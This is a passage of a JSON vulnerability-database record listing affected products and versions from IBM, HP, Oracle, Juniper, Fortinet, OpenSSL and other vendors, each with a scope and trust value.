      {
        "model": "db2\u00ae advanced enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.6"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.2.0.8"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "abyp-0t-4s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "junos d20",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "comware products",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "50"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.17"
      },
      {
        "model": "exalogic infrastructure eecs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "2.0.6.2.3"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.5"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.15"
      },
      {
        "model": "gpfs storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.4"
      },
      {
        "model": "abyp-4ts-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "sterling connect:enterprise for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.0.38"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.07"
      },
      {
        "model": "project openssl 0.9.8q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "infosphere master data management provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "websphere transformation extender secure adapter collection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.1.2"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "cloud orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.1"
      },
      {
        "model": "abyp-10g-4lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.1.0.6"
      },
      {
        "model": "abyp-10g-4lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "hp-ux b.11.11.16.09",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.4.0.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.8"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.8"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.4.0.5"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.3"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.5.0.2"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.4"
      },
      {
        "model": "db2 advanced workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "db2 enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.07"
      },
      {
        "model": "junos 12.3x48-d30",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "smartcloud entry fixpack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.413"
      },
      {
        "model": "junos 12.1x46-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1.0"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.1"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1768"
      },
      {
        "model": "elastic storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "abyp-0t-0s-4l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.38"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "db2\u00ae enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "project openssl 1.0.2a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "abyp-4t-0s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "db2 enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.0.5"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.4.1"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.12"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.3.3"
      },
      {
        "model": "hp-ux b.11.11.13.14",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "system networking rackswitch g8124-e",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.5.0"
      },
      {
        "model": "junos 14.1r6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.7"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.16"
      },
      {
        "model": "project openssl 0.9.8g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.3"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.0"
      },
      {
        "model": "system networking rackswitch g8124-e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.4.0"
      },
      {
        "model": "abyp-0t-2s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3.0.10"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.5"
      },
      {
        "model": "db2 express edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.4"
      },
      {
        "model": "tivoli endpoint manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.17"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.11"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.2"
      },
      {
        "model": "project openssl 0.9.8ze",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "comware products",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "70"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.15"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.63"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.5"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.3.0.12"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.1.7"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v39.7"
      },
      {
        "model": "worklight consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.2"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "fortirecorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "2.0.1"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.5"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.3"
      },
      {
        "model": "hp-ux b.11.23.1.007",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "db2\u00ae express edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "fortianalyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.9"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.5"
      },
      {
        "model": "smartcloud orchestrator enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.0"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "hp-ux b.11.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.7"
      },
      {
        "model": "db2 developer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "forticlient windows/mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.3"
      },
      {
        "model": "smartcloud orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.31"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "abyp-0t-2s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "db2 connect enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "flashsystem 9848-ac1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "flashsystem 9840-ae2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "security directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.4"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.34"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "abyp-2t-0s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.8"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3387"
      },
      {
        "model": "sterling connect:enterprise for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.4.04"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.64"
      },
      {
        "model": "abyp-10g-4sr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "http server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "db2 luw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.0.5"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.4.0.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.9"
      },
      {
        "model": "db2\u00ae workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "security network controller 1.0.3352m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.16"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.8"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.14"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.14"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "project openssl 0.9.8l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "enterprise session border controller ecz7.3m2p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.13"
      },
      {
        "model": "tivoli endpoint manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "db2\u00ae connect? unlimited edition for system i\u00ae",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "db2\u00ae advanced enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "version control repository manager 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "system networking rackswitch g8264t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.15.0"
      },
      {
        "model": "virtual connect enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "project openssl h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "system networking rackswitch g8264",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.5.0"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.2"
      },
      {
        "model": "i v5r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.0.2.0"
      },
      {
        "model": "tealeaf customer experience",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "system networking rackswitch g8264",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.4.0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.411"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.6"
      },
      {
        "model": "sdk for node.js for bluemix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0.12.4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.4.0.5"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.0"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.213"
      },
      {
        "model": "flashsystem 9846-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.3.0"
      },
      {
